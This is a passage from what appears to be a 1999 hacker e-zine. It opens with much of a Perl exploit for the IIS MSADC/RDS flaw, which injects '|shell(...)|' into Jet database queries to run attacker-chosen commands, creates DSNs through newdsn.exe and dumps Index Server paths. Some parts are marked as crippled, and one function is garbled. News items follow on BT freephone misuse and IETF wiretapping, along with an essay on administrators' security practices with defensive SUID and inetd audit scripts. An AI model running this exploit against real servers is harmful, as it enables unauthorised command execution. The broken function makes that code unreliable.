if (defined $args{e}){ print "\nStep 6: Trying dictionary of DSN names..."; &dsn_dict; }
else { print "\nNo -e; Step 6 skipped.\n"; }}

print "\n\nNo luck, guess you'll have to use a real hack, eh?\n";
exit;

##############################################################################

sub sendraw {   # this saves the whole transaction anyway
        my ($pstr)=@_;
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,80,$target)){
                open(OUT,">raw.out");
                my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ print OUT $_; push @in, $_;
                        print STDOUT "." if(defined $args{X});}
                close(OUT); select(STDOUT); close(S); return @in;
        } else { die("Can't connect...\n"); }}

##############################################################################

sub make_header { # make the HTTP request
 my ($aa, $bb);
 if (defined $args{V}){ $aa="VbBusObj.VbBusObjCls.GetRecordset"; $bb="2"; }
 else { $aa="AdvancedDataFactory.Query"; $bb="3";}

#crippled
ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=$bb

--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: $reqlen

EOT
;
 $msadc=~s/\n/\r\n/g;
 return $msadc;}

##############################################################################

sub make_req { # make the RDS request
 my ($switch, $p1, $p2)=@_;
 my $req=""; my ($t1, $t2, $query, $dsn);

 if ($switch==1){ # this is the btcustmr.mdb query
   $query="Select * from Customers where City='|shell(\"$command\")|'";
   $dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .
        $p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}

 elsif ($switch==2){ # this is general make table query
   $query="create table AZZ (B int, C varchar(10))";
   $dsn="$p1";}

 elsif ($switch==3){ # this is general exploit table query
   $query="select * from AZZ where C='|shell(\"$command\")|'";
   $dsn="$p1";}

 elsif ($switch==4){ # attempt to hork file info from index server
   $query="select path from scope()";
   $dsn="Provider=MSIDXS;";}

 elsif ($switch==5){ # bad query
   $query="select";
   $dsn="$p1";}

 elsif ($switch==6){ # this is table-independent query (new)
   $query="select * from MSysModules where name='|shell(\"$command\")|'";
   $dsn="$p1";}

 $t1= make_unicode($query);
 $t2= make_unicode($dsn);
 if(defined $args{V}) { $req=""; } else {$req = "\x02\x00\x03\x00"; }
 $req.= "\x08\x00" . pack ("S1", length($t1));
 $req.= "\x00\x00" . $t1 ;
 $req.= "\x08\x00" . pack ("S1", length($t2));
 $req.= "\x00\x00" . $t2 ;
 $req.="\r\n--!ADM!ROX!YOUR!WORLD!--\r\n";
 return $req;}

##############################################################################

sub make_unicode { # quick little function to convert to unicode
        my ($in)=@_; my $out;
        for ($c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . "\x00"; }
        return $out;}

##############################################################################

sub rdo_success { # checks for RDO return success (this is kludge)
        my (@in) = @_; my $base=content_start(@in);
        if($in[$base]=~/multipart\/mixed/){
          return 1 if( $in[$base+10]=~/^\x09\x00/ );}
        return 0;}

##############################################################################

sub make_dsn { # this (tries to) make a DSN for us
        print "\nMaking DSN: ";
        foreach $drive (@drives) {
        print "$drive: ";
        my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B" .
                "Access\%2BDriver\%2B\%28*.mdb\%29\&dsn=wicca\&dbq=" .
                $drive . "\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr= HTTP/1.0\n\n");
        $results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#;
        return 0 if $2 eq "404"; # not found/doesn't exist
        if($2 eq "200") {
                foreach $line (@results) {
                        return 1 if $line=~/<H2>Datasource creation successful<\/H2>/;}} }
        return 0;}

##############################################################################

sub verify_exists {
        my ($page)=@_;
        my @results=sendraw("GET $page HTTP/1.0\n\n");
        return $results[0];}

##############################################################################

sub try_btcustmr {

        foreach $dir (@sysdirs) {
                print "$dir -> "; # fun status so you can see progress
                foreach $drive (@drives) {
                        print "$drive: "; # ditto
        $reqlen=length( make_req(1,$drive,$dir) ) - 28;
        $reqlenlen=length( "$reqlen" );
        $clen= 206 + $reqlenlen + $reqlen;

        my @results=sendraw(make_header() . make_req(1,$drive,$dir));
        if (rdo_success(@results)){print "Success!\n";
        save("dbq=".$drive.":\\".$dir."\\help\\iis\\htm\\tutorial\\btcustmr.mdb;");
        exit;}
        else { verbose(odbc_error(@results)); funky(@results);}}
        print "\n";}}

##############################################################################

sub odbc_error {
        my (@in)=@_; my $base = content_start(@in);
        if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this
        $in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
        $in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
        $in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
        return $in[$base+4].$in[$base+5].$in[$base+6];}
        print "\nNON-STANDARD error. Please send this info to rfp\@wiretrip.net:\n";
        print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
                $in[$base+4] . $in[$base+5] . $in[$base+6]; exit;}

##############################################################################

sub verbose {
        my ($in)=@_;
        return if !$verbose;
        print STDOUT "\n$in\n";}

##############################################################################

sub save {
        my ($p1)=@_;
        my $ropt="";
        open(OUT, ">rds.save") || print "Problem saving parameters...\n";
        if (defined $args{c}){ $ropt="c ";}
        if (defined $args{V}){ $ropt.="V ";}
        if (defined $args{w}){ $ropt.="w ";}
        print OUT "v2\n$ip\n$ropt\n$p1\n";
        close OUT;}

##############################################################################

sub load {
        my ($action)=@_;
        my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)};";
        open(IN,"<rds.save") || die("Couldn't open rds.save\n");
        @p=<IN>; close(IN);
        die("Wrong rds.save version") if $p[0] ne "v2\n";
        $ip="$p[1]"; $ip=~s/\n//g;
        $target= inet_aton($ip) || die("inet_aton problems");
        print "Resuming to $ip ...";
        @switches=split(/ /,$p[2]);
        foreach $switch (@switches) { $args{$switch}="1";}
        if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
        print "Type the command line you want to run ($comm assumed):\n" . "$comm ";
        $in=<STDIN>; chomp $in;
        $command="$comm " . $in ;
        $torun="$p[3]"; $torun=~s/\n//g;
        if($torun=~/btcustmr/){ $args{'c'}="1";} # this is a kludge to make it work
        if($torun=~/^dbq/){ $torun=$drvst.$torun; }
        if(run_query("$torun")){ print "Success!\n";} else { print "failed\n"; }
        exit;}

##############################################################################

sub create_table {
        return 1 if (!defined $args{c});
        return 1 if (defined $args{V});
        my ($in)=@_;
        $reqlen=length( make_req(2,$in,"") ) - 28;
        $reqlenlen=length( "$reqlen" );
        $clen= 206 + $reqlenlen + $reqlen;
        my @results=sendraw(make_header() . make_req(2,$in,""));
        return 1 if rdo_success(@results);
        my $temp= odbc_error(@results); verbose($temp);
        return 1 if $temp=~/Table 'AZZ' already exists/;
        return 0;}

##############################################################################

sub known_dsn {
        foreach $dSn (@dsns) {
                print ".";
                next if (!is_access("DSN=$dSn"));
                if(create_table("DSN=$dSn")){
                        if(run_query("DSN=$dSn")){
                                print "$dSn: Success!\n"; save ("dsn=$dSn"); exit; }}}
        print "\n";}

##############################################################################

sub is_access {
        my ($in)=@_;
        return 1 if (!defined $args{c});
        return 1 if (defined $args{V});
        $reqlen=length( make_req(5,$in,"") ) - 28;
        $reqlenlen=length( "$reqlen" );
        $clen= 206 + $reqlenlen + $reqlen;
        my @results=sendraw(make_header() . make_req(5,$in,""));
        my $temp= odbc_error(@results);
        verbose($temp);
        return 1 if ($temp=~/Microsoft Access/);
        return 0;}

##############################################################################

sub run_query {
        my ($in)=@_; my $req;
        if (defined $args{c}){$req=3;} else {$req=6;}
        $reqlen=length( make_req($req,$in,"") ) - 28;
        $reqlenlen=length( "$reqlen" );
        $clen= 206 + $reqlenlen + $reqlen;
        my @results=sendraw(make_header() . make_req($req,$in,""));
        return 1 if rdo_success(@results);
        my $temp= odbc_error(@results); verbose($temp);
        return 0;}

##############################################################################
#crippled
##############################################################################

sub hork_idx {
        print "\nAttempting to dump Index Server tables...\n";
        print "  NOTE: Sometimes this takes a while, other times it stalls\n\n";
        $reqlen=length( make_req(4,"","") ) - 28;
        $reqlenlen=length( "$reqlen" );
        $clen= 206 + $reqlenlen + $reqlen;
        my @results=sendraw(make_header() . make_req(4,"",""));
        if (rdo_success(@results)){
                my $max=@results; my $c; my %d;
                for($c=19; $c<$max; $c++){
                        $results[$c]=~s/\x00//g;
                        $results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g;
                        $results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g;
                        $results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/;
                        $d{"$1$2"}="";}
                foreach $c (keys %d){ print "$c\n"; }
        } else {print "Index server not installed/query failed\n"; }}

##############################################################################

sub dsn_dict {
        open(IN, "<$args{e}") || die("Can't open external dictionary\n");
        while(<IN>){
                $hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold";
                print ".";
                next if (!is_access("DSN=$dSn"));
                if(create_table("DSN=$dSn")){
                        if(run_query("DSN=$dSn")){
                                print "Success!\n"; save ("dsn=$dSn"); exit; }}}
        print "\n"; close(IN);}

##############################################################################

sub content_start { # this will take in the server headers
        my (@in)=@_; my $c;
        for ($c=1;$c<500;$c++) { # assume there's less than 500 headers
         if($in[$c] =~/^\x0d\x0a/){
          if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; }
          else { return $c+1; }}}
        return -1;} # it should never get here actually

##############################################################################

sub funky {
        my (@in)=@_; my $error=odbc_error(@in);
        if($error=~/ADO could not find the specified provider/){
                print "\nServer returned an ADO misconfiguration message\nAborting.\n";
                exit;}
        if($error=~/A Handler is required/){
                print "\nServer has custom handler filters (they most likely are patched)\n";
                exit;}
        if($error=~/specified Handler has denied Access/){
                print "\nADO handlers denied access (they most likely are patched)\n";
                exit;}
        if($error=~/server has denied access/){
                print "\nADO handlers denied access (they most likely are patched)\n";
                exit;}}

##############################################################################
#crippled
##############################################################################

sub use_unc {
        $uncpath=$args{u};
        $driverline="driver={Microsoft Access Driver (*.mdb)};dbq=";
        if($uncpath!~/^\\\\[a-zA-Z0-9_.]+\\[-a-zA-Z0-9_]+\\.+/){
                print "Your UNC path sucks. You need the following format:\n".
                "\\\\server(ip preferable)\\share\\some-file.mdb\n\n"; exit; }
        if(create_table($driverline.$uncpath)){
                if(run_query($driverline.$uncpath)){
                        print "Success!\n"; save ("dbq=".$uncpath); exit;}} }

##############################################################################

sub get_name { # this was added last minute
my $msadc=<.,?]//g;
print "Machine name: $results[$base+6]\n";}

##############################################################################

# special greets to trambottic, hex_edit, vacuum (technotronic), all #!adm,
# #!w00w00 & #rhino9 (that's a lot of people, and they are all very elite and
# good friends!), wiretrip, l0pht, nmrc & all of phrack
#
# thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice
#
# I wish I could really name everyone, but I can't.  Don't feel slighted if
# your not on the list... :)

##############################################################################

@HWA

06.0 Online encrypted privacy for email and WWW
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Submitted by: Ed
     URL: https://ca.privacyx.com/

The PrivacyX website is an anonymous and encrypted web based email system that allows you to send encrypted anonymous email through their pop3 servers. You will have to accept a signed certificate from their site and install it on your system; the site currently only offers 512 bit keys, presumably to keep the international nature of the site open. Once you have edited your config to use the mail.privacyx.com servers you are ready to send and receive email using the service.

A test email sent an hour ago still has not arrived as of yet; I'll update when (if) it comes through.
@HWA

07.0 More on the Chris Buckley Saga
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Contributed by Abattis

From http://www.theregister.co.uk/991119-000003.html

Posted 19/11/99 11:56am by Linda Harrison

0800 court case adjourned...

Chris Buckley, the teenager accused of using a BT 0800 number to access the Web without permission, yesterday had his case adjourned to December.

The 18-year-old had his appearance at Corby Magistrates Court, Northamptonshire, put back to December 3 to enable his solicitor to take instructions.

Buckley, from Oundle, Northamptonshire, allegedly used a BT freephone number to access the Net without authorisation or permission.

He faces three charges: gaining unauthorised access to the Internet; posting material on newsgroups that may have caused "an annoyance"; and using profanities. ®

-=-

Posted 18/05/99 11:44am by Tim Richardson

Fraud charges follow abuse of BT 0800 test number

An anonymous Net user has been accused of fraud and threatened with legal action for using a toll-free number to access the Web that was reserved for use by BT staff.

A letter, purportedly sent by BT customer relations manager Keith Lawton, orders the unnamed customer to cough up for the 680 hours and 45 minutes spent online illegally -- or face legal action.

The letter also warns the crafty BT customer that if he/she does it again, the police will be called "with a view to criminal charges being brought".

Having already issued a warning to stop using the number, Lawton wrote: "By continuing to use that freephone number you have committed fraud against us."

"As you have knowingly used our internal ISP without our express authorisation, we are billing you for all the time that you have been online using our freephone number by converting all time spent online to a national number," Lawton wrote.

There is no indication exactly how much the bill is for but it could run into many hundreds of pounds.
A spokesman for BT said the company would not comment on an individual customer's bill and also questioned the validity of the letter. It could be genuine, or it could be a hoax, he said.

Since no one is prepared to say one way or the other, The Register has decided to let its readers decide whether it's kosher or not.

Check out the letter here: http://www.angelfire.com/ar/bt0800/

-=-

Posted 19/05/99 11:44am by Tim Richardson

BT fraud letter outed as a fake

The letter accusing a BT customer of fraud is bogus, according to a learned reader of The Register.

Matthew Garrett, a medical student at Cambridge University said: "The alleged letter from BT is a fake.

"Putting it through a colour filter reveals that the BT logo in the top left corner and the bar code and footer have been scanned in and pasted on top of a computer-generated document.

"Creases are also clearly visible around the staple region, but oddly enough aren't anywhere else on the page.

"And as a final nail in its coffin, the background of the main page is full red, green and blue, a value that is highly unlikely to occur in nature since paper tends to be slightly off-white.

"The rest of the page is plain and perfect white, which would only occur in a computer-generated image.

"Hence it is fake.

"If anyone can produce that with a scanner and a perfectly ordinary sheet of paper, I'd be greatly impressed.

"My version of it is here, and I know there's some other enhanced copies floating around," he said.

http://www-jcsu.jesus.cam.ac.uk/~mjg59/0800.jpg

To see yesterday's story about the alleged fake letter, click here.

After his thorough job on this little number it looks like Matthew will have no problems sailing through his post mortem course.
®

-=-

Unrelated story:

Posted 12/11/99 3:41pm by Tim Richardson

22,000 people and the 08004u security lapse

It seems the 22,000 or so people who gained totally toll-free access to the Net earlier this week courtesy of Scottish ISP, 08004u, didn't even have to blag their way past password security.

That's because there was no security. It simply didn't exist. Any login ID and password would have got them into 08004u's network and onto the Web, The Register has learned.

According to some of those who took advantage of the Scottish ISP's generosity, 08004u just left the doors wide open allowing anyone to walk in completely uncontested.

"I could dial their 0800 number, and have the login IAMCOOL and password ANYTHING, and it would work," wrote one Net user who asked to remain anonymous.

"I find this to be an insult to the people that are paying their £50 a month [for unmetered access]," he said, revealing he was one of 08004u's subscribers.

It'll be interesting to know how 08004u is planning to pay for this charity...after all, there's no such thing as a free lunch. ®

@HWA

08.0 Security Practices Today, Or Lack Thereof
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by Erik

A new article in the Buffer Overflow section illustrates what system administrators are doing these days in the way of security. You may be surprised, or not, at what some administrators consider to be secure computing practices.

Buffer Overflow
http://www.hackernews.com/orig/buffero.html

Security practices today. Or lack thereof
By: Erik Parker, Mind Security

Companies are not giving computer security the attention that it needs. I have interviewed several System Administrators and Security Administrators. What I found was what I had expected, that things just aren't getting done the way they should be.

Most companies that have over 100 employees have their own computer operations staff.
Unix Administrators, NT Administrators, Novell Administrators, etc., of course all depending on the individual network. Companies that are computer companies, making software, doing internet business, or depend on every single user using their computer usually have larger network staffs; makes sense, right? All too often network security is not a concern on these smaller networks. Even more sad than that, all too often it isn't a concern on larger networks: networks with thousands of users and a fulltime staff of administrators, or companies who have permanent in-house contractors.

"Network Security" is left up to the Administrators. That isn't so bad if your administrators happen to be security specialists. However, most of the time that isn't the case. Companies expect their network to be secure, or just don't expect. Many places don't have policies, or have a plan to someday start one, but don't want to bother until it becomes a problem, after they have been hacked, or inside info starts leaking out and the SEC is coming down their throat.

We interviewed 7 Unix Administrators and 3 NT Administrators. We didn't gain any worthwhile knowledge from the NT Administrators, as none of them knew about security or were concerned with it. If I had more time, I could have interviewed some that dealt with their own firewalls and all the network security. So from here on out, I will refer to only Unix Admins.

All of the Unix Admins we interviewed were in charge of keeping their machines secure. Some were in charge of their firewall, some weren't. The most common security practice was simply shutting down services that weren't needed. End of story. In other cases the Admins would keep lists of patch levels, and every couple of months go out and check for new versions of the daemons they were running. Many of them didn't know how to search their machines for SUID binaries, and couldn't understand why it would matter.
Several others claimed that they didn't bother to shut down services, because the firewall blocked all incoming connections to those machines except on specific ports, like SMTP and HTTP. When I asked those Admins if they were in control of their entire network, some were, and some weren't. The ones who weren't claimed to know that there were other points of entry into the network besides the firewall that controls direct access to their specific server cluster.

I asked a specific set of questions to each person; I never went on to ask questions to counter their responses, mainly because if I had, I would have been teaching them security, and putting thoughts into their head. Well, that is why this article is being written.

I was surprised to hear a few administrators tell me that they didn't worry about security breaches, because there was nothing on their network that hackers or crackers would care about. I guess I had to chuckle about that. There doesn't have to be top-secret files, some new operating system, or something that is plainly obvious. Most of the hacks and cracks that you hear about are done for web page changes. That seems to be what is in the media most often. Many hacks go unreported as well, for reasons of the stock market, embarrassment, and several Admins won't even admit to their own boss after finding out about the hack, as they think it will be thought of as their fault. Which, unless they are the security admin, and properly trained in it, it shouldn't be.

Companies often hire Security Penetration engineers, or if you will, strike teams, to break into their network and test security, from outside or inside. Sometimes they don't bother to give these teams user level access, which is very stupid, since regular users could be the very problem.
Also quite often a machine will be compromised via a daemon that isn't running as root, only granting the hacker the daemon's user level access, and from that they can gain root access from local exploits, the same local exploits some companies never have the strike teams check for.

Some of the Security Administrators I spoke to gave me a quick run down of what they do to secure a network. Their quick list was to set up a firewall and only allow the access that was needed. I won't go into detail about proper firewall rules and such; I don't want to get that technical here. They also said they would remove utilities that aren't going to be used on the servers. For instance, an Ultra 5 with Solaris 7 on it, that has one function, to run Apache and serve web pages all day, and do nothing else. Does it need the capability to print? Does it need OpenWindows or CDE installed? No. These Admins would remove packages not needed, and other ones that aren't in use by the system. Others that may be used by the Admins at some point, and are Set UID root, get their sticky bit removed. Users don't need root level access to most of these. On most systems, if you would like to see all of the files on it that are SUID root, issue this command:

`find / \( -perm -4000 -o -perm -2000 \) ! -type d -exec ls -ldb {} \; >> output.log`

The other things the Admins said they would do are to keep up to date on all of the patches, and actively keep up with their software. I personally get on the maker of the software's mailing list, development lists, and user list. This makes for a pretty busy procmail, but you will catch things early on.

Other things Security Admins do are to secure every machine, and any machine they aren't in control of they don't trust from anywhere on their network. They of course shut off all services not needed, like 98% of what is in /etc/inetd.conf. Any daemon that will run properly chrooted to its own directory gets set that way.
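The find(1) one-liner above answers the question once; what an administrator actually wants to know is when the answer changes, because a setuid binary that was not there yesterday is one of the oldest signs of a local root compromise. The script below is an added example, not part of Erik Parker's article: it wraps the same predicates in a sorted inventory, saves a baseline, and reports every setuid/setgid file that appeared or disappeared since. The scratch directory, file names and baseline path in the demo are constructed for illustration.

```sh
#!/bin/sh
# Added example, not from the article: repeatable setuid/setgid inventory
# with baseline comparison. Uses the same find(1) predicates as the article
# (-perm -4000, -perm -2000, not directories). All paths below are constructed.

# Print "mode path" for every setuid or setgid file under the root given as $1,
# sorted so that two runs can be compared line by line.
list_privileged() {
    find "$1" \( -perm -4000 -o -perm -2000 \) ! -type d -exec ls -ld {} \; 2>/dev/null \
        | awk '{ print $1, $NF }' | sort
}

# Record the current inventory of root $1 in the baseline file $2.
save_baseline() {
    list_privileged "$1" > "$2"
}

# Compare root $1 against baseline file $2. Prints "+ mode path" for files that
# gained a setuid/setgid bit since the baseline and "- mode path" for files
# that lost it or vanished. Returns 0 when nothing changed, 1 when it did.
check_baseline() {
    cur=$(mktemp) || return 2
    list_privileged "$1" > "$cur"
    added=$(comm -13 "$2" "$cur")      # lines only in the current inventory
    removed=$(comm -23 "$2" "$cur")    # lines only in the baseline
    rm -f "$cur"
    rc=0
    if [ -n "$added" ]; then
        printf '%s\n' "$added" | sed 's/^/+ /'
        rc=1
    fi
    if [ -n "$removed" ]; then
        printf '%s\n' "$removed" | sed 's/^/- /'
        rc=1
    fi
    return $rc
}

# Constructed demonstration: a scratch tree with one setuid and one setgid
# file is baselined, then a new setuid file shows up, which is exactly the
# change this check exists to catch. Returns check_baseline's status.
demo() {
    root=$(mktemp -d)
    touch "$root/ping" "$root/wall" "$root/ls"
    chmod 4755 "$root/ping"      # setuid, expected
    chmod 2755 "$root/wall"      # setgid, expected
    chmod 755 "$root/ls"         # ordinary binary, never reported
    save_baseline "$root" "$root.baseline"
    touch "$root/sh.bak"; chmod 4755 "$root/sh.bak"   # the unexpected newcomer
    check_baseline "$root" "$root.baseline"; rc=$?
    rm -rf "$root" "$root.baseline"
    return $rc
}

# Usage: suidwatch.sh save ROOT BASELINE | check ROOT BASELINE | demo
case "${1:-}" in
    save)  save_baseline "$2" "$3" ;;
    check) check_baseline "$2" "$3" ;;
    demo)  demo ;;
esac
```

Run `save` once after the box is built and `check` from cron; a non-zero exit is the alert. Keep the baseline file off the monitored host (or at least outside the tree being scanned), since anyone who can plant a setuid binary can also edit a baseline stored next to it.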
Any program that can run as a non-privileged user gets set that way. There is more that a dedicated Security Administrator does, but there is just too much to go through. Keep in mind that you should never install software from binary distributions if possible. With source you read the source if you wish, and compile without the extra options you may not need. Often exploits for programs are in features in the software that you didn't really need, but got compiled in by default.

Something I am not touching on too much, but intrusion detection can be a good way to go as well. There are many types of software and even hardware that do it. You can monitor your systems for attacks, attempts, or full-blown break-ins. There is software called "Anti-Sniff" that is just that: a sniffer detector. If one of your machines is compromised, and someone is sniffing your network for passwords, data, or some other information, this will detect it. You can find Anti-Sniff at http://www.l0pht.com/antisniff/.

We also recommend for networks with more than a couple machines, setting up a dedicated log host. This machine serves ONE function, and one alone: to log. You set up all your remote machines to have their syslog piped off to this machine. It doesn't need to be a huge box, or an expensive box. I have used a 486-100 running Linux, and had 35 servers logging to it. Put a 20 gig drive in it, and have it compress logs every so often. Works like a dream. If you use a big server for it, you will often find your management having this "Great Idea" to use it to run other services as well. I personally have been asked before to make our loghost the ssh gateway from the outside; I hope you can see the problems in that yourself.
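The previous paragraph's advice to shut off most of what lives in /etc/inetd.conf is easy to state and easy to drift away from: someone uncomments a line to debug something and it stays on. This added example (not from the article) makes that a check rather than a memory: it lists the services an inetd.conf currently enables, flags any not on an explicit allowlist, and writes a copy with everything else commented out so the change can be reviewed before it replaces the real file. The sample inetd.conf and the allowlist are constructed for the demonstration.

```sh
#!/bin/sh
# Added example, not from the article: audit an inetd.conf against an
# allowlist of services that are meant to stay enabled, and produce a
# hardened copy with everything else commented out. The sample file below
# is constructed for the demonstration, not taken from any real host.

# inetd.conf line format: service socket proto wait/nowait user server args
# A line is inert when it is blank or its first non-blank character is '#'.

# Print the distinct service names enabled in inetd.conf $1.
enabled_services() {
    awk '!(/^[[:space:]]*#/ || /^[[:space:]]*$/) { print $1 }' "$1" | sort -u
}

# Print enabled services in $1 that are not in the space-separated allowlist $2.
unexpected_services() {
    awk -v allow=" $2 " '
        !(/^[[:space:]]*#/ || /^[[:space:]]*$/) && !index(allow, " " $1 " ") { print $1 }
    ' "$1" | sort -u
}

# Write a hardened copy of $1 to stdout: allowed services untouched, every
# other active line commented out, existing comments and blank lines kept.
disable_unexpected() {
    awk -v allow=" $2 " '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { print; next }   # already inert
        index(allow, " " $1 " ")            { print; next }   # on the allowlist
        { print "#" $0 }                                      # anything else: off
    ' "$1"
}

# Constructed sample inetd.conf, written to the file named in $1.
write_sample_conf() {
    cat > "$1" <<'EOF'
# constructed sample inetd.conf
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
#shell  stream  tcp     nowait  root    /usr/sbin/tcpd  in.rshd
login   stream  tcp     nowait  root    /usr/sbin/tcpd  in.rlogind
finger  stream  tcp     nowait  nobody  /usr/sbin/tcpd  in.fingerd
echo    stream  tcp     nowait  root    internal
echo    dgram   udp     wait    root    internal
ssh     stream  tcp     nowait  root    /usr/sbin/tcpd  sshd -i
EOF
}

# Demonstration: audit the sample against an allowlist of just "ssh" and show
# what is enabled before and after hardening.
demo() {
    conf=$(mktemp)
    write_sample_conf "$conf"
    echo "enabled:         $(enabled_services "$conf" | tr '\n' ' ')"
    echo "unexpected:      $(unexpected_services "$conf" ssh | tr '\n' ' ')"
    disable_unexpected "$conf" ssh > "$conf.hardened"
    echo "after hardening: $(enabled_services "$conf.hardened" | tr '\n' ' ')"
    rm -f "$conf" "$conf.hardened"
}

if [ "${1:-}" = "demo" ]; then demo; fi
```

The allowlist is deliberately a plain string of service names rather than a pattern, so a reviewer can read exactly what is permitted; `unexpected_services` run from cron against the live file gives the same "has anything changed" signal as the setuid check, and `disable_unexpected` produces the file you would diff, then install, then HUP inetd with.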
Something else that is difficult for companies to understand and put up with, and many don't, and end up suffering because of it, is the fact that many skilled Administrators spend a lot of time associating themselves with what would be classified by the media and the US government as Black hat hackers. However, they are the very people we are protecting networks against, and they often get information before we do. They are often a great resource for information, and even for tips when you have questions. You have to know both sides to be successful. We aren't hurting them any by securing the networks. There will always be networks out there that aren't secure. It also gives them more of a challenge in life, which is often something they consider fun. I personally don't believe in the labeling of White hats or Black hats, as many people who are considered to be black hats go to work every day in a suit and tie, get paid 150k a year, and are the best security administrators there are. There isn't a ton like that, but some of them are batting for both teams. What would that make them, gray hats?

There is a bigger problem that exists. It is what we call Upper Management. You know, the person who signs your purchase orders, gives you your paycheck, and the same person who never thinks about security. It costs money, and that is bad. They think because they don't see a problem, don't fix it. What stupid logic that is. You won't ever see a skilled hacker, as they will come in, get what they want, and disappear and perhaps never run across your network again. I think it is much better to have a cracker hit a site than a hacker. I'd much rather have a server erased, or a web page changed, than to have a hacker come in and rip off software, or documents, or project plans that my company has been working on for years, and sell it to competitors, or post them on some stock board, and make my company's stock fall 50%. Upper management doesn't care about that.
They either don't understand what security is, or just don't think it could happen to them. The problem is, you will rarely, most likely never, look like a hero at your company. If you do get the go ahead to do serious security work, hire an outsider, or hire a fulltime security admin, and they do a good job, you won't get hacked. Life goes on as it was, and it seems like a waste of money. Your boss doesn't lose sleep at night thinking about how insecure your network is, but you might, since it is your fault either way if it gets hacked. If you don't implement security, then you are certainly not shown off as a hero, unless you track him down, file suit, and he happens to be rich, and your company makes a boatload of money. Not likely going to happen; once it's reported to the FBI, and they do their research, and maybe even raid someone, it's years later, and you have moved on to a new company.

You have to think up every single problem on the network, what could happen, and show it to your boss. Make a chart, show problems, and show costs. In most cases the cost of cleanup, and potential loss of money, is far more than hiring a security staff. Some Upper Management understand more clearly if you put it simply, such as "Do you get the oil in your Porsche changed every three to five months? Even though nothing was wrong?" Most likely they do, or at least know that they SHOULD. It is a fact that if you keep up the maintenance schedule, you have fewer problems. Well, same way with computers.

It is difficult in most companies, very difficult. Even worse if you are working for the government, since every penny has to be cleared, and it takes time. Most of the time you either end up doing it and never getting recognized, or paid. If you don't have the time, well, that would explain why you see so many government cracks listed on web page defacement sites like attrition.org. It is a difficult job, and if you work for a consulting company, you are in luck.
It most likely isn't your job to sell the audits; you just do them for the company who was convinced that they needed it. You do have a harder job though, and that is writing up a security policy, and making the company understand they MUST follow it. Many just want their network locked down, and don't care about a policy. If you only care about the money, so be it. If you care about doing the best job you can, getting the security done right, you need to make them understand they have to make your security policy, well, policy.

Security today, and in the past, just isn't what it needs to be. Most companies consider it to be a pain, and an expense that isn't needed or justified. Companies need to focus on the area, and big companies need to hire a fulltime security admin, or keep an open account with a contractor for routine security audits, and have their administrators trained on keeping up to date on things. All companies should have someone who monitors mailing lists like Bugtraq, or NT Bugtraq, depending on what platforms you are running. Things need to change, and if you are in a position where you can do that, I suggest you do it right now.

If you firmly believe in the future of the Internet and E-commerce, I also know that if I were the only person buying things on-line, every e-commerce site would shut down, because I just can't afford to keep them all going. I've talked to a couple of people who say they won't buy anything online. They don't think their credit cards are secure, or their personal information. People are scared of it, and they keep hearing about hackers, and all these evil things going on that they don't understand. Many web sites try to comfort people by explaining the encryption method for the browsers, and leave it at that.
For the people who have been living under rocks, and have only heard about credit card stealing, and not about hacking, and computers being compromised, or for the people who just don't understand what that means, they think their data going encrypted is all there is to it. Many people don't realize when hackers get credit card numbers, they get them in bulk usually, rarely from sniffing, but from compromising the machine that holds these plain text files, or databases holding the information. @HWA 09.0 Internet Wiretapping Still a Possibility ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Brian Oblivion While approximately fifty-five percent of the Internet Engineering Task Force voted against a measure to include wiretapping capabilities into new protocols there was not a high enough objection to close the issue permanently. The director of the transport area of the IETF said that unless the proposal receive a much stronger objection the possibility of including these features still exists. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2392616,00.html?chkpt=zdnnstop -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Internet wiretapping still a threat By Robert Lemos, ZDNN November 11, 1999 5:24 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2392616,00.html A push by law enforcement to make the Internet wiretap-friendly hit a major snag on Wednesday, when members of the Internet Engineering Task Force -- the body responsible for setting Internet standards -- overwhelmingly said 'no' to a key question. The question: Should the IETF put features in forthcoming protocols whose sole purpose is to facilitate wiretapping? 
Scott Bradner, director of the Transport Area of the IETF -- where the motion was originally proposed -- estimates that 55 percent of the members answered 'no,' another 15 percent said 'yes,' and the rest abstained.

Not resolved

